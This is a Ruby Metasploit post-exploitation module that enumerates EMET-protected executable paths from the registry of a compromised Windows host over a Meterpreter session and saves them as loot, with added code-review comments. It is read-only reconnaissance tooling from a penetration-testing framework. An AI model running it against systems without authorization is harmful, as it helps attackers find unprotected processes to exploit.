##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
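class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Common

  # Registry key EMET uses for per-application settings. The module treats each
  # value name under it as the path of a protected executable (that is all the
  # code reads: value names, not value data).
  EMET_APPSETTINGS_KEY = 'HKLM\\SOFTWARE\\Microsoft\\EMET\\AppSettings'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather EMET Protected Paths',
        'Description' => %q{ This module will enumerate the EMET protected paths on the target host.},
        'License' => MSF_LICENSE,
        'Author' => [ 'vysec <vincent.yiu[at]mwrinfosecurity.com>' ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Prefix every status line with the session peer so output from several
  # concurrent sessions can be told apart.
  def print_status(msg = '')
    super("#{peer} - #{msg}")
  end

  # Same peer prefix for "good" lines.
  def print_good(msg = '')
    super("#{peer} - #{msg}")
  end

  # Enumerate the value names under the EMET AppSettings key, print them and
  # store them as loot ('host.emet_paths'). Read-only against the target.
  #
  # Returns nil. No loot is written when the key cannot be read or when it
  # holds no values.
  def run
    # Pick the registry view from the reported architecture so the native
    # 64-bit hive is read on x64 hosts (presumably sysinfo['Architecture'] is
    # the OS architecture rather than the session's — confirm against the
    # meterpreter sysinfo contract).
    reg_view = sysinfo['Architecture'] == ARCH_X64 ? REGISTRY_VIEW_64_BIT : REGISTRY_VIEW_32_BIT
    reg_vals = registry_enumvals(EMET_APPSETTINGS_KEY, reg_view)

    # The existing nil check assumes the helper returns nil when the key cannot
    # be read (absent, or access denied); that is distinct from a key that
    # exists but has no values, which comes back as an empty array.
    if reg_vals.nil?
      print_error('Failed to enumerate EMET protected paths (registry key unavailable).')
      return
    end

    # NOTE(review): EMET reached end of life in 2018. A missing or empty key
    # does not mean the host has no exploit mitigations — Exploit Guard /
    # Defender settings are not checked by this module.
    if reg_vals.empty?
      print_status('EMET AppSettings key exists but lists no protected paths.')
      return
    end

    print_status('Found protected processes:')
    reg_vals.each { |protected_path| print_status(protected_path) }

    loot_path = store_loot('host.emet_paths', 'text/plain', session, reg_vals.join("\r\n"), 'emet_paths.txt', 'EMET Paths')
    print_good("Results stored in: #{loot_path}")
  end
end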